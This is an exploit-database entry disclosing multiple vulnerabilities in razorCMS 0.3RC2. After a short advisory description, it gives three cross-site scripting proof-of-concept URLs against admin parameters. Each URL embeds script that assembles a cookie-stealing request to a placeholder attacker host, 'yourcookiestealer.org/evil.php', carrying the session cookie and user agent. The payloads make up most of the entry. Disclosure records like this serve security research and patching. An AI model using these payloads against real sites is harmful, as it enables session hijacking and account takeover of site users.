RazorCMS 0.3RC2 - Multiple Vulnerabilities

2009-04-16T00:00:00
ID EXPLOITPACK:2B4363AF748D00D120634CEF11D9799A
Type exploitpack
Reporter Jeremi Gosney
Modified 2009-04-16T00:00:00

Description

RazorCMS 0.3RC2 - Multiple Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/34566/info

razorCMS is prone to a local information-disclosure vulnerability, a local access-validation vulnerability, a security-bypass vulnerability, and multiple cross-site-scripting vulnerabilities.

Attackers can exploit these issues to gain access to sensitive information, create denial-of-service conditions, gain elevated privileges, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successful exploits may aid in further attacks.

razorCMS 0.3RC2 is vulnerable; other versions may also be affected.

http://www.example.com/cms/admin/?action=edit&slab=home'><script>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent));</script><form

http://www.example.com/cms/admin/?action=showcats&unpub=true&slabID=1&catname=sidebar'><script>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent));</script><form

http://www.example.com/cms/admin/?action=reordercat&cat=sidebar'><script>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent));</script><form&param=0,1